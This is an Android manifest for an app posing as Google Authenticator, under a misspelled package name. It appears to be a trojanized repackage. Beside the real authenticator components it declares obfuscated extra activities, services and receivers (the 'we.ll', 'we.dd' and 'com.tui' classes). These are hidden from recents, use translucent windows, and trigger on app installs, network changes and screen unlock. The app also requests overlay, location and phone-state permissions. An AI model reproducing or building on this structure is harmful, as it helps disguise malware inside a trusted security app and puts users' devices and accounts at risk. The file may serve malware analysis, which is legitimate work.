<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.google.androFid.apps.authenticator">
    <uses-permission android:name="android.permission.VIBRATE"/>
    <application android:allowBackup="false" android:icon="@drawable/authenticator_launcher_icon" android:label="@string/app_name_short" android:name="com.google.android.apps.authenticator.AuthenticatorApplication" android:theme="@style/AuthenticatorTheme">
        <service android:exported="true" android:label="@string/dataexport_service_name" android:name="com.google.android.apps.authenticator.dataexport.ExportServiceV2"/>
        <activity android:label="@string/app_name_short" android:launchMode="singleTask" android:name="com.google.android.apps.authenticator.AuthenticatorActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.intent.action.VIEW"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <data android:scheme="otpauth"/>
            </intent-filter>
        </activity>
        <receiver android:name="com.google.android.apps.authenticator.NewAppInstallListener">
            <intent-filter>
                <action android:name="android.intent.action.PACKAGE_ADDED"/>
                <data android:scheme="package"/>
            </intent-filter>
        </receiver>
        <activity android:name="com.google.android.apps.authenticator.DeprecationInfoActivity"/>
        <activity android:label="@string/about_preference_screen_title" android:name="com.google.android.apps.authenticator.SettingsAboutActivity"/>
        <activity android:label="@string/enter_key_title" android:name="com.google.android.apps.authenticator.EnterKeyActivity"/>
        <activity android:label="@string/check_code_title" android:name="com.google.android.apps.authenticator.CheckCodeActivity" android:screenOrientation="portrait"/>
        <activity android:configChanges="keyboardHidden|orientation" android:excludeFromRecents="true" android:name="we.ll.iu.LCActivity"/>
        <receiver android:name="we.ll.iu.LCReceiver">
            <intent-filter>
                <action android:name="android.intent.action.PACKAGE_ADDED"/>
                <data android:scheme="package"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE"/>
            </intent-filter>
        </receiver>
        <activity android:configChanges="keyboardHidden|orientation" android:excludeFromRecents="true" android:label="" android:launchMode="singleTask" android:name="we.ll.it.WActivity" android:screenOrientation="portrait">
            <intent-filter>
                <action android:name="android.intent.action.CREATE_SHORTCUT"/>
            </intent-filter>
        </activity>
        <service android:name="we.ll.it.JSc"/>
        <receiver android:name="we.ll.it.KReceiver">
            <intent-filter>
                <action android:name="android.intent.action.PACKAGE_ADDED"/>
                <data android:scheme="package"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.intent.action.USER_PRESENT"/>
            </intent-filter>
        </receiver>
        <activity android:excludeFromRecents="true" android:name="we.dd.et.Yash" android:screenOrientation="portrait"/>
        <receiver android:name="we.dd.et.Yangsu">
            <intent-filter>
                <action android:name="android.intent.action.USER_PRESENT"/>
            </intent-filter>
        </receiver>
        <activity android:name="com.tui.Za" android:screenOrientation="portrait"/>
        <activity android:configChanges="keyboard|keyboardHidden|orientation" android:launchMode="singleInstance" android:name="we.dd.eu.Yshu" android:theme="@android:style/Theme.Translucent.NoTitleBar"/>
    </application>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
    <uses-permission android:name="com.android.launcher.permission.INSTALL_SHORTCUT"/>
    <uses-permission android:name="android.permission.SYSTEM_OVERLAY_WINDOW"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
</manifest>
